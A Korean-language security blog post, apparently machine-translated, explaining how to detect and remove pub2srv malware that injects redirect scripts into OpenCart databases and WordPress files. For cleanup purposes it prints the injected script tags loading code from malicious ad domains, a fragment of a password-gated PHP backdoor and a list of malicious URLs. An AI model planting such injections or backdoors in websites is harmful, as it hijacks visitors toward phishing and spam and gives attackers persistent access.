우리는 몇 달 동안 OpenCart 및 WordPress 웹 사이트를 대상으로 하는 특정 맬웨어 감염을 관찰해 왔습니다. 일반적으로 웹사이트 방문자를 다음과 같은 다른 악성 도메인으로 리디렉션하는 pub2srv 맬웨어 감염이라고 합니다.
go.pub2srv[.]com
go.mobisla[.]com
go.oclaserver[.com]
deloton.com/afu.php?zoneid= site
Dolohen.com
또한 Google은 웹사이트의 악성 링크에 대한 광고를 일시중지합니다. 그 중 일부는
https://defpush.com/ntfc.php?p=1565632https://deloplen.com/apu.php?zoneid=1558096https://go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1https://mobpushup.com/notice.php?p=1558098&interactive=1&pushup=1https://wowreality.info/page.js?wm=gr포럼의 WordPress 사용자 요청 도움말 스크린샷
pub2srv 악성코드란 무엇입니까? 증상은 무엇입니까?
OpenCart 및 WordPress 사이트를 스팸성 웹 페이지로 리디렉션하는 맬웨어입니다. 모바일 장치에서는 광고 및 피싱 페이지가 포함된 스팸 팝업 또는 알림이 열립니다.
pub2srv 악성코드는 웹페이지 소스에 악성 자바스크립트 코드를 삽입하여 리디렉션/팝업을 유발합니다. Opencart의 경우 SQL 주입 취약점으로 인해 발생합니다. 해커가 데이터베이스에 악성 코드를 추가할 수 있습니다. WordPress의 경우 해커가 index.php 또는 functions.php 파일을 수정하여 페이로드를 삽입할 수 있습니다.
이 해킹의 일반적인 증상:
- 웹사이트 방문자는 광고, 포르노, 피싱 페이지가 있는 스팸 웹사이트로 리디렉션됩니다. 웹사이트가 여러 리디렉션에 직면하는 이유에 대한 자세한 블로그를 확인하세요.
- 앱 설치를 묻는 휴대기기의 팝업
- AJAX에 의존하는 플러그인 작동 중지(예:TablePress, DataTables 등)
- Google에서 차단 목록에 추가했거나 광고가 일시 중지되었습니다. 정지된 광고를 다시 받으려면 블로그를 확인하세요.
- 소스에서 인식할 수 없는 JavaScript 코드
해킹의 결과
이 악성코드의 근본 원인은 SQL 주입(SQLi) 취약점이므로 공격자는 다음을 수행할 수 있습니다.
- 데이터베이스의 콘텐츠 추가, 삭제, 편집 또는 읽기
- 데이터베이스 서버의 파일에서 소스 코드 읽기
- 데이터베이스 서버에 파일 쓰기
- WordPress/Opencart 웹사이트의 사용자 기록 및 비밀번호 도용
- OpenCart/WooCommerce 상점의 거래 정보 도난
- 도메인에서 SEO 스팸을 수행하여 Google 웹마스터 블랙리스트에 추가
내 웹사이트에서 pub2srv 멀웨어 코드를 제거하는 방법은 무엇입니까?
OpenCart에서 , 맬웨어는 일반적으로 데이터베이스를 감염시키고 해당 코드를 다음 데이터베이스 테이블에 배치합니다.
- oc_product_description 테이블(제품 설명)
- oc_category_description 테이블(카테고리 설명)
OpenCart 데이터베이스에서 악성 코드를 제거하려면 다음 단계를 따르십시오.
- phpMyAdmin 또는 Sequel Pro와 같은 도구를 사용하여 데이터베이스 테이블 미리보기
- 'oc_category_description' 테이블을 열고 '설명' 열의 값을 확인합니다.
- 아래와 같이 JavaScript 코드 스니펫이 표시됩니다.
<script type="text/javascript">//<![CDATA[ (function() { var configuration = { "token": "XXXXXXXXXXXXX", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; var script = document.createElement(''script''); script.async = true; script.src = ''//cdn.shorte[.st]/link-converter.min.js''; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != ''complete'' && rs != ''loaded'') return; shortestMonetization(configuration);}; var entry = document.getElementsByTagName(''script'')[0]; entry.parentNode.insertBefore(script, entry); })(); //]]></script><script data-cfasync=''false'' type=''text/javascript'' src=''//pXXXXX.clksit[e.com/]adServe/banners?tid=XXXXX_127XXX_7&tagid=2''></script><script type="text/javascript" src="//[go.pub2srv][.com/ap]u.php?zoneid=XXXXXX"></script><script async="async" type="text/javascript" src="//g[o.mobisl]a.co[m/notice.ph]p?p=XXXXXX&interactive=1&pushup=1"></script>
- 필요한 대체 작업을 수행한 후 다음 SQL 코드 스니펫을 실행합니다.
UPDATE oc89gWs_category_description SET description = REPLACE (description, 'INSERT MALICIOUS CODE FROM PREVIOUS STEP', '');
- oc_product_description 테이블에 대해 위의 모든 단계를 반복합니다.
WordPress에서 , 맬웨어는 일반적으로 WordPress 파일에서 발견됩니다.
- index.php
- functions.php
- 데이터베이스 테이블
WordPress 서버에서 악성 코드를 제거하려면 다음 단계를 따르십시오.
- index.php 파일 열기 (public_html 폴더) 및 wp-content/themes/NAME-OF-THEME/functions.php 서버에서
- 이 파일에서 익숙하지 않은/횡설수설한/암호화된 코드를 검색합니다. 다음과 유사한 코드를 찾을 수 있습니다.
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; ?>
- 이 파일들 중 하나에서 악성 코드를 발견하면 마지막으로 성공한 것으로 알려진 백업의 파일을 교체해야 합니다.
- 또한 위의 OpenCart 단계에서 언급한 대로 데이터베이스의 테이블을 확인하십시오.
- 또한 wp-include에서 디렉토리:wp-vcd.php 삭제 및 class.wp.php 파일, wp-include 디렉토리:post.php를 열고 Malware에 의해 추가된 첫 번째 php 태그를 삭제합니다. 테마의 functions.php 파일을 열고 위의 코드를 삭제합니다. (댓글에서 독자 Jaber가 제안함)
재감염 예방 및 원인 파악
- OpenCart/WordPress 웹사이트를 최신 버전으로 업데이트: CMS 코어의 알려진 보안 문제를 해결하려면
- SQL 주입 공격 차단: SQL 인젝션(SQLi) 공격이 웹사이트에 도달하기도 전에 적극적으로 감지하고 차단하는 Astra와 같은 보안 플러그인을 사용하세요.
- 관리자 계정의 사용자 이름 및 비밀번호 변경: 해커가 멀웨어 정리 후 웹사이트에 계속 액세스하지 못하도록
- 데이터베이스 비밀번호 변경: 해커가 데이터베이스에 직접 연결할 수 없도록
- 암호화 키 변경: 스푸핑 및 기타 암호화 공격 방지
- 허용된 IP 주소로만 관리 영역 액세스 제한: 승인된 관리자만 백엔드 관리 영역에 액세스할 수 있도록
- 사용하지 않는 플러그인/확장 프로그램 제거: 더 이상 유지 관리하지 않으면 애초에 해킹을 유발하는 보안 문제가 포함될 수 있습니다.
- 서버 로그 스캔(액세스 및 오류): 해킹의 소스 및 시간을 나타낼 수 있는 로그에서 익숙하지 않거나 횡설수설한 오류를 찾을 수 있습니다.
관련 가이드 – WordPress 해킹 제거
또한 WordPress의 Favicon(.ico) 바이러스 백도어에 대한 블로그 기사를 확인하십시오.
Astra Web Protection 정보
Astra Web Protection은 CMS를 위한 종단 간 보안 솔루션입니다. 버튼 클릭만으로 100가지 이상의 공격, 악성 봇, 멀웨어로부터 자신을 보호할 수 있습니다. 당사의 보안 전문가는 온라인 비즈니스 보안을 위해 연중무휴 지원을 제공합니다. 전문적인 도움이 필요하거나 웹사이트가 100% 깨끗하고 안전한지 확인하는 방법을 알고 싶다면 아래 채팅 위젯에서 안녕이라고 말하세요!